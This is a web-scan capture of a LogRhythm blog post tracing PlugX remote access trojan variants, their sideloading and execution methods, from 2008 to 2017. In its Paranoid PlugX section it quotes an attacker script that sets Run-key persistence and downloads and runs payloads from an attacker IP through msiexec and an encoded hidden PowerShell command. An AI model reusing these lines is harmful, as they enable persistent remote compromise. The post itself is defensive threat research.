logrhythm.com
Open in
urlscan Pro
141.193.213.20
Public Scan
URL:
https://logrhythm.com/blog/deep-dive-into-plugx-malware/
Submission: On September 23 via api from DE — Scanned from DE
Submission: On September 23 via api from DE — Scanned from DE
Form analysis 4 forms found in the DOM
<form class="mktoForm mktoHasWidth mktoLayoutLeft" data-formid="1920" id="" novalidate="novalidate" style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 800px;">
<div id="spinner-overlay" style="display: none;">
<div class="cv-spinner"><span class="spinner padding-top-10 padding-bottom-10"></span></div>
</div>
<style type="text/css">
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton {
color: #fff;
border: 1px solid #75ae4c;
padding: 0.4em 1em;
font-size: 1em;
background-color: #99c47c;
background-image: -webkit-gradient(linear, left top, left bottom, from(#99c47c), to(#75ae4c));
background-image: -webkit-linear-gradient(top, #99c47c, #75ae4c);
background-image: -moz-linear-gradient(top, #99c47c, #75ae4c);
background-image: linear-gradient(to bottom, #99c47c, #75ae4c);
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:hover {
border: 1px solid #447f19;
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:focus {
outline: none;
border: 1px solid #447f19;
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:active {
background-color: #75ae4c;
background-image: -webkit-gradient(linear, left top, left bottom, from(#75ae4c), to(#99c47c));
background-image: -webkit-linear-gradient(top, #75ae4c, #99c47c);
background-image: -moz-linear-gradient(top, #75ae4c, #99c47c);
background-image: linear-gradient(to bottom, #75ae4c, #99c47c);
}
</style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="FirstName" id="LblFirstName" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>First:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="FirstName" name="FirstName" placeholder="First Name" maxlength="255" aria-labelledby="LblFirstName InstructFirstName" type="text"
class="mktoField mktoTextField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructFirstName" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="LastName" id="LblLastName" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Last:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="LastName" name="LastName" placeholder="Last Name" maxlength="255" aria-labelledby="LblLastName InstructLastName" type="text"
class="mktoField mktoTextField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructLastName" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email" name="Email" placeholder="Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_campaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_medium" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_source" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_term" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AdGroup" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="asset_url" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LandingPageURL" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="TY_Page_URL__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="https://logrhythm.com/blog-newsletter-subscription-ty/" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_language__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_region__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_social__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="FALSE" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoSimple" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe Now</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="1920"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="050-UWT-888">
</form><form class="mktoForm form-inline global-footer-form mktoHasWidth mktoLayoutLeft" data-formid="1920" data-tyredr="false" id="" novalidate="novalidate"
style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 192px;">
<div id="spinner-overlay">
<div class="cv-spinner"><span class="spinner padding-top-10 padding-bottom-10"></span></div>
</div>
<style type="text/css">
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton {
color: #fff;
border: 1px solid #75ae4c;
padding: 0.4em 1em;
font-size: 1em;
background-color: #99c47c;
background-image: -webkit-gradient(linear, left top, left bottom, from(#99c47c), to(#75ae4c));
background-image: -webkit-linear-gradient(top, #99c47c, #75ae4c);
background-image: -moz-linear-gradient(top, #99c47c, #75ae4c);
background-image: linear-gradient(to bottom, #99c47c, #75ae4c);
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:hover {
border: 1px solid #447f19;
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:focus {
outline: none;
border: 1px solid #447f19;
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:active {
background-color: #75ae4c;
background-image: -webkit-gradient(linear, left top, left bottom, from(#75ae4c), to(#99c47c));
background-image: -webkit-linear-gradient(top, #75ae4c, #99c47c);
background-image: -moz-linear-gradient(top, #75ae4c, #99c47c);
background-image: linear-gradient(to bottom, #75ae4c, #99c47c);
}
</style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="FirstName" id="LblFirstName" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>First:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="FirstName" name="FirstName" placeholder="First Name" maxlength="255" aria-labelledby="LblFirstName InstructFirstName" type="text"
class="mktoField mktoTextField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructFirstName" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="LastName" id="LblLastName" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Last:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="LastName" name="LastName" placeholder="Last Name" maxlength="255" aria-labelledby="LblLastName InstructLastName" type="text"
class="mktoField mktoTextField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructLastName" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email" name="Email" placeholder="Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_campaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_medium" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_source" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_term" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AdGroup" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="asset_url" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LandingPageURL" class="mktoField mktoFieldDescriptor mktoFormCol" value="https://logrhythm.com/blog-subscription/?utm_content=global-footer-form" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="TY_Page_URL__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="https://logrhythm.com/blog-subscription-ty/" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_language__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_region__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_social__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="FALSE" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoSimple" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe Now</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="1920"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="050-UWT-888">
</form><form class="mktoForm mktoHasWidth mktoLayoutLeft" data-formid="1920" novalidate="novalidate"
style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form><form class="mktoForm form-inline global-footer-form mktoHasWidth mktoLayoutLeft" data-formid="1920" data-tyredr="false" novalidate="novalidate"
style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form>Text Content
Modernize your SOC strategy. Learn How
1-866-384-0713
Customer Portal
Toggle navigation
* Products
* LogRhythm SIEM Platform
We built the LogRhythm SIEM Platform with you in mind. Defending your
enterprise comes with great responsibility. With intuitive,
high-performance analytics and a seamless incident response workflow, your
team will uncover threats faster, mitigate risks more efficiently, and
produce measurable results.
* LogRhythm Cloud
Simplify your security operations with full LogRhythm SIEM without the
hassle of managing infrastructure.
* LogRhythm UEBA
Bring clarity and context to anomalous user behavior by corroborating risk
with full-featured UEBA.
* LogRhythm NDR
Eliminate blind spots and monitor your network in real time with ML-driven
threat detection and response and a built-in MITRE ATT&CK engine.
* Security Solutions
* SIEM
Detect, investigate, and neutralize threats with our end-to-end platform.
* SOAR
Work smarter, more efficiently, and more effectively.
* UEBA
Detect anomalous user behavior and threats with advanced analytics.
* Log Management
Gain full visibility into your data and the threats that hide there.
* Threat Detection
Build a strong foundation of people, process, and technology to accelerate
threat detection and response.
* Compliance
Meet and report on compliance mandates, including PCI, HIPAA, NERC, CIP,
and more.
* Zero Trust Security Model
How to protect your people, devices, and data across the enterprise.
* MITRE ATT&CK Framework
How do your strategic security defenses stand up to the MITRE ATT&CK
framework?
* Security Solutions Overview
* Industries
* Healthcare
Protecting sensitive patient healthcare data.
* Government
Meet the challenges of defending public sector data.
* Financial Services
Safeguarding data and minimizing risk in financial services.
* Utilities
Safeguarding systems and devices in critical utility infrastructure.
* Manufacturing
Defend your operational technology environment with SIEM.
* Legal
Protect your law firm’s network and data.
* Work With Us
* Partners
* Technology Alliance Program
* Technology Partners
* Services Authorized Partners
* Partner Portal
* Customers
* Welcome to LogRhythm
* Champions Network
* Customer Success
* Training
* Support & Community
* Services Overview
* Is your security team stressed?
* If you work in security, hearing that stress is impacting your space is
likely no surprise. Learn why your team may be experiencing more stress
than ever before in this new research.
*
* Download the Research
* Request Demo
* LogRhythm Community
* Resources
* Resource Library
* Analyst Reports
* Product Demos
* White Papers & e-Books
* Case Studies
* Use Cases
* Threat Research
* On-Demand Webcasts
*
* All Resources
*
* Blog
Read the latest security news and insights from security professionals and
our award-winning LogRhythm Labs team.
* Events
Connect with LogRhythm security experts at trade shows, conferences, and
events across the globe.
* LogRhythm Labs
Learn how our team of security experts can help you succeed through their
real-world SOC experience.
*
*
* Featured Content
* About
* About Us
* Our Story
* Executive Team
* Awards & Recognition
* Logiving
* Customer Testimonials
* In the News
* Press Releases
* Careers
*
* Contact Us
* See why organizations choose us
* Customers and peers agree. Working with LogRhythm is a recipe for success.
Don’t just take it from us. Read reviews from our customers on Gartner
Peer Insights.
*
*
*
* See why LogRhythm is a nine-time Gartner Magic Quadrant for SIEM leader
* Get the Report
* Request Info
TAKE A DEEP DIVE INTO PLUGX MALWARE
Posted on April 18, 2018 | Featured | No Comments
Category: LogRhythm Labs | Security Tips and Tricks | Threat Research
Type: Blog
In June 2017, Palo Alto’s Unit 42 Threat Research team published an excellent
blog post on a newly detected version of the PlugX malware family, also known as
“Korplug.” Interested to find out more about this new variant, I started digging
around and found that there have been many new samples of “PlugX v1.” This isn’t
too surprising considering that a builder for version one of the malware has
been publicly available for several years. However, this piqued my curiosity. I
decided to look into where these old samples were used and whether there was any
specific targeting. In terms of malware detection, it is always interesting to
see old code repurposed or reused in new attacks and campaigns, as seen in the
resurgence of Shamoon Malware in 2016.
A HISTORY OF PLUGX MALWARE
The PlugX malware family is well known to researchers, with samples dating back
to as early as 2008, according to researchers at Trend Micro. PlugX is a fully
featured Remote Access Tool/Trojan (RAT) with capabilities such as file upload,
download, and modification, keystroke logging, webcam control, and access to a
remote cmd.exe shell.
Until recently, distinct versions of PlugX malware maintained consistent
methodologies for encryption, configuration, and persistence — despite evolution
of the tool’s development over the years. In 2014, there was a resurgence of
this malware family, making it the most utilized family of that year, according
to Crowdstrike’s Global Threat Report released in February 2015. Changes to the
command and control (C2) options contributed to this resurgence because the
malware authors implemented new DNS C2 methodology that made traffic harder to
detect.
Until the end of 2016, the typical PlugX infection methodology was the same: The
malware payload was typically delivered via a phishing campaign, either as an
attached self-extracting RAR (SFX) archive, link to an archive, or embedded in a
weaponized document. This archive contains three files that make up the PlugX
components. An example of these three components is as follows (extracted from
the RAR archive with SHA-256 hash
1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0):
Figure 1: PlugX Component Files
Although the above sample used an NVIDIA application, many PlugX samples of this
variant leveraged applications associated with antivirus or various other
security products. Because these executables are signed, legitimate
applications, endpoint security products are less likely to flag them.
Furthermore, usage of antivirus-related applications can potentially take
advantage of product whitelisting on the endpoint.
There have been many extensive analyses of the aforementioned PlugX variants
over the years, as is evident by the lengthy — and yet still incomplete —
references in the Appendix of this post, so I will not repeat a full analysis
here. However, a brief overview of the “original” or “classic” PlugX execution
method is available below.
Figure 2: PlugX SFX Archive Components
CLASSIC PLUGX EXECUTION METHODOLOGY
Below is a depiction of the execution methodology for the classic variant of
PlugX — most variants roughly follow this pattern, but there are some
deviations. Execution flow in general proceeds as follows:
1. The three PlugX components are extracted from the archive to a temporary
directory on the system.
2. The legitimate, signed program is executed and the malicious loader DLL is
sideloaded.
3. The loader DLL decrypts and decompresses the payload file.
4. The decrypted shellcode is injected into a legitimate system process.
* Note: This step is performed in different ways (code injection, process
hollowing) depending on the specific variant of PlugX, but the basic
methodology is the same.
5. Injected Windows process conducts C2/PlugX functionality.
Figure 3: PlugX Execution Chain
CORE PLUGX MALWARE FUNCTIONALITY EVOLVES
In 2013, multiple updates to the core PlugX malware functionality occurred,
including the addition of new C2 protocols, encryption, and installation
methodologies. Researchers with Airbus analyzed several samples that appeared to
be from mid-to-late 2013. These samples represented an intermediate version of
PlugX, with characteristics falling between the original “v1” and “v2” variants.
The main updates in this variant included a new, custom encryption algorithm
used for configuration data, network communications, and strings within the
binaries. Also featured in this variant was the addition of the ICMP protocol as
a new C2 methodology and a modification of the HTTP packet format. Later
versions of this variant added DNS C2 as a module.
In 2013, researchers at Lastline also detected variants that included an update
to the PlugX malware deployment and installation methodologies. Although the
dropped files and chain of execution matched that of the classic PlugX variants
(three components: legitimate executable, loader DLL, and encrypted payload),
these samples featured User Account Control (UAC) evasion functionality and an
alternative process creation mechanism using Component Object Model (COM)
objects.
Researchers at Sophos first discovered a new strain of memory-resident PlugX at
the end of 2013. The malware was discovered in a campaign exploiting a
vulnerability in the popular Japanese word processing software, Ichitaro. Unlike
the classic PlugX samples that drop the three components previously discussed,
the “diskless” samples do not use the sideloading technique with a valid
executable — the loader DLL and payload are not written as files to disk. The
memory-resident PlugX, upon successful exploitation of the delivery method
(typically a weaponized Rich Tech Format (RTF) document), executes shellcode
that decrypts and decompresses the payload, which is a masked DLL file that is
then loaded in memory and executed.
While 2014 showed a great uptick in the use of PlugX in Advanced Persistent
Threat (APT) campaigns, the variants observed mostly consisted of v1/v2
“classic” samples. In 2015, however, researchers observed a few variants that
deviated from the classic execution methodology and added a new communication
methodology to the PlugX repertoire. In the beginning of 2015, researchers from
JPCERT reported on a variant of PlugX that added peer-to-peer (P2P)
functionality, allowing the malware to communicate with other infected hosts on
the local network.
Fast forward to March 2015: Carbon Black detected an additional PlugX variant
that used a different loading methodology compared to earlier samples. In this
variant, only the loader DLL and encrypted payload are dropped to the system;
the malware uses the legitimate Windows system file rundll32.exe to execute the
malicious PlugX DLL from an export rather than relying on sideloading.
In August 2015, researchers at Airbus discovered a new variant of the “original”
PlugX. This variant utilized a fourth file in the initial installation of the
RAT. This file, also embedded in the SFX RAR, is a small executable file that
provides an additional execution method of the main binary. The executable
creates the registry value
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\18\ShellExecute
with the data pointing to the PlugX installation binary. This registry key maps
special keyboard keys to commands or programs, such as music or mail, that
execute when someone presses that key. Key number 18 typically corresponds to
the “calculator” key. Once this registry key is set, the malware
programmatically triggers a “press” of the key, thereby executing the
installation binary. This method effectively provides an alternative execution
of the malware chain.
Similar to the 2008 campaign, PlugX is often used with another common RAT called
Poison Ivy. In 2017, researchers from JPCERT discovered a variant of PlugX that
actually had code overlap with Poison Ivy in the form of a hash algorithm. This
code was used to obscure the Windows API calls in the binary. The format of the
final decrypted payload of the new samples departed from the methodology of
previous PlugX variants, instead the format mimicked that of Poison Ivy.
In June 2017, researchers at Palo Alto Networks released a review of a new PlugX
variant they detected on their networks, which they named “Paranoid PlugX.” This
variant added several new mechanisms for avoiding security controls and
detection, including new methods for determining the C2 server address after
execution, new loading methodology, and new methods for avoiding detection on
disk. Rather than dropping the executable, loader DLL, and payload to disk, this
variant used a Visual Basic (VB) script to perform two attempts to download and
execute the code.
a=new ActiveXObject(WScript.Shell);
a.run('%windir%\\System32\\reg.exe add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v MSASCuiL2 /t reg_sz /d %windir%\\System32\\msiexec.exe /q /i hxxp://172.104.65\.97/Tasks.png /f', 0);window.close();
a.run('%windir%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -ep bypass -enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQAwADQALgA2ADUALgA5ADcALwBnAHUAZQBzAHQALgBwAHMAMQAnACkAOwAKAA==', 0);window.close();
</script>
Figure 3: Paranoid PlugX Download and Execution Script
The above code creates persistence in the “Run” registry key for the execution
of a file downloaded from the URL in the command. The code highlighted in blue
uses PowerShell to download another PowerShell file named “guest.psl” from the
same IP address as the first command. In both cases, the embedded PlugX
shellcode that is executed are identical. Another feature that makes Paranoid
PlugX deviate from previous variants is that the embedded payload is wrapped in
a .NET Framework file, which has not been seen in other samples.
TIMELINE OF PLUGX VARIANTS
The following is a rough timeline that illustrates when samples of the variants
discussed were initially reported publicly. Note: The dates below correspond to
detection/reporting of samples displaying the stated functionality — the actual
samples referenced may have compilation or creation dates earlier than those
listed below.
Figure 4: PlugX History Timeline
PLUGX REMAINS A THREAT
Although there have been several variants over the years, an analysis of the
timeline of variants discussed demonstrates the “original” PlugX variant
continues to be used today. Despite the evolution of PlugX methodologies and
techniques, these classic PlugX samples remain successful and are still utilized
in adversarial campaigns as a result.
In conducting this research, I found a wealth of information from different
research groups published over the last eight years. While this is by no means
inclusive of all PlugX research conducted, the resources cover many of the
highlights of the malware’s evolution over the years.
Click here to view the sources of PlugX variants mentioned above.
--------------------------------------------------------------------------------
SUBSCRIBE TO OUR BLOG NEWSLETTER
*
First:
*
Last:
*
Email:
Subscribe Now
Share on LinkedIn Share on Twitter Share on Facebook Share on Reddit Share on
Email
SUBSCRIBE TO OUR BLOG NEWSLETTER
*
First:
*
Last:
*
Email:
Subscribe Now
--------------------------------------------------------------------------------
* Healthcare
* Government
* Utilities
* Financial Services
* Manufacturing
* Legal
--------------------------------------------------------------------------------
PRODUCTS
* LogRhythm SIEM
* LogRhythm NDR
* LogRhythm UEBA
* LogRhythm Cloud
* AnalytiX
* DetectX
* RespondX
SOLUTIONS
* SIEM
* SOAR
* UEBA
* Log Management
* Threat Detection
* Compliance
* MITRE ATT&CK
* Zero Trust
RESOURCES
* Calculate ROI w/LogRhythm
* Pricing & Licensing
* Product Demos
* White Papers & e-Books
* Product Data Sheets
* Testimonials
* Analyst Reports
* Case Studies
* Use Cases
* Threat Research
* Infographics
* Brochures
* Webcasts
PARTNERS
* Partner Portal
* Services Authorized Partners
* Technology Partners
* Joint Solution Briefs
SUPPORT
* Getting Started
* SIEM-Supporting Services
* Customer Success
* Global Support Services
* LogRhythm Labs
* Training
* Knowledge Base
* Documentation
* Product Security
COMPANY
* Our Story
* Leadership
* Press Releases
* In the News
* Careers
AWARDS & RECOGNITION
* 2021 SIEM Gartner Magic Quadrant Leader
*
COMMUNITY
CONNECT WITH US
* LogRhythm Blog
* Customer Portal
* Champions Network
* Contact
* Events
SUPPORT
+1-866-255-0862
SALES
+1-866-384-0713 info@logrhythm.com
© LogRhythm, Inc. All Rights Reserved. Privacy Policy | Terms & Conditions
We are using cookies to give you the best experience on our website.
You can find out more about which cookies we are using or switch them off in
settings.
Accept
Close GDPR Cookie Settings
* Privacy Overview
* Strictly Necessary Cookies
Powered by GDPR Cookie Compliance
Privacy Overview
This website uses cookies so that we can provide you with the best user
experience possible. Cookie information is stored in your browser and performs
functions such as recognising you when you return to our website and helping our
team to understand which sections of the website you find most interesting and
useful.
Strictly Necessary Cookies
Strictly Necessary Cookie should be enabled at all times so that we can save
your preferences for cookie settings.
Enable or Disable Cookies
If you disable this cookie, we will not be able to save your preferences. This
means that every time you visit this website you will need to enable or disable
cookies again.
Enable All Save Settings